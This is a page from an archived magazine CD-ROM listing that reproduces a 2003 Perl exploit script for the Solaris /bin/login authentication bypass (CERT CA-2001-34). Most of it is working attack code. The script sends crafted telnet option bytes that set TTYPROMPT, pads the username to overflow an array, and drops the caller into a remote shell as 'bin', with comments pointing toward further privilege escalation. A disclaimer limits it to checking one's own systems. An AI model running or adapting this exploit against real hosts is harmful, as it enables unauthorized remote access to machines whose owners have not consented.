Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / login.pl < prev next >

Wrap

Perl Script | 2005-02-12 | 3KB | 118 lines

#!/usr/bin/perl # # Date: 09/01/2003 # Author: snooq [http://www.angelfire.com/linux/snooq/] # # I coded this script to demo how to login to a Solaris box without # password as 'bin'. Nothing new, it's an old bug which dates back # to Dec 2001. # # And, there are already several versions of exploits circulating # in the wild for at least a year now. # # Due to uninformed/incompetent/ignorant sysadmins, there are still # quite a number of vulnerable machines out there. # # 'root' remote login is not allowed by defaut. So, unless, it's # a misconfigured box, you can only go as high as 'bin'. However, # once you are dropped into a shell, further priviledge escalation is # very possible. # # Background info # =============== # From http://www.mail-archive.com/bugtraq@securityfocus.com/msg09281.html # # [quote] # The problem is there exists an authentication flag called the "fflag" # just after the array that gets overflowed in the .bss segment. This is # an array of char pointers so when it is overflowed because of an # mismanagement on the indexing of this array the fflag gets overwritten # with an valid address on .bss segment. this is good enough to satify # the if(fflag) condition and spawn a shell. # [/quote] # # For more info about this bug, go to: # http://www.cert.org/advisories/CA-2001-34.html # # Disclaimer # ========== # This is meant for you to do a quick check own your systems only. # The author shall not be held responsible for any illegal use # of this code. # # -> some asked 'why code another one?' # I'm bored.. I guess.... been using other ppl's tools... it's time # to write my own.. so that I have a reason to feel proud too... # # -> again, some asked 'why not in C?' # ok... I'm lame.. my C sucks... my Perl sucks too... # I'm not a professional programmer anyway... =p # # As usual, any comments or flames, go to jinyean at hotmail.com # use Socket; use FileHandle; if ($ARGV[0] eq '') { print "Usage: $0 <host>\n"; exit; } $payload="\xff\xfc\x18" # Won't terminal type ."\xff\xfc\x1f" # Won't negotiate window size ."\xff\xfc\x21" # Won't remote flow control ."\xff\xfc\x23" # Won't X display location ."\xff\xfb\x22" # Will linemode ."\xff\xfc\x24" # Won't environment option ."\xff\xfb\x27" # Will new environment option ."\xff\xfb\x00" # Will binary transmission ."\xff\xfa\x27\x00" # My new environ option ."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54" # 'TTYPROMPT' ."\x01\x61\x62\x63\x64\x65\x66" # 'abcdef', any 6 chars will do ."\xff\xf0"; # Suboption end $port=23; $user="bin"; # You may change this to another user $addr=getaddr($ARGV[0]); for ($i;$i<65;$i++) { $user.=" c"; # Again, any char will do } socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]); connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n"; print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n"; print "Connected. Wait for a shell....\n"; SOCKET->autoflush(); $pid=fork; if ($pid) { # Parent reads send(SOCKET, $payload, 0); send(SOCKET, "$user\n", 0); read(SOCKET,$buff,69); # Read the garbage while (<SOCKET>) {; print STDOUT $_; } } else { # Child sends print SOCKET while (<STDIN>); close SOCKET; } exit; sub getaddr { my $host=($_[0]); my $n=$host; $n=~tr/\.//d; if ($n=~m/\d+/) { return pack('C4',split('\.',$host)); } else { return (gethostbyname($host))[4]; } }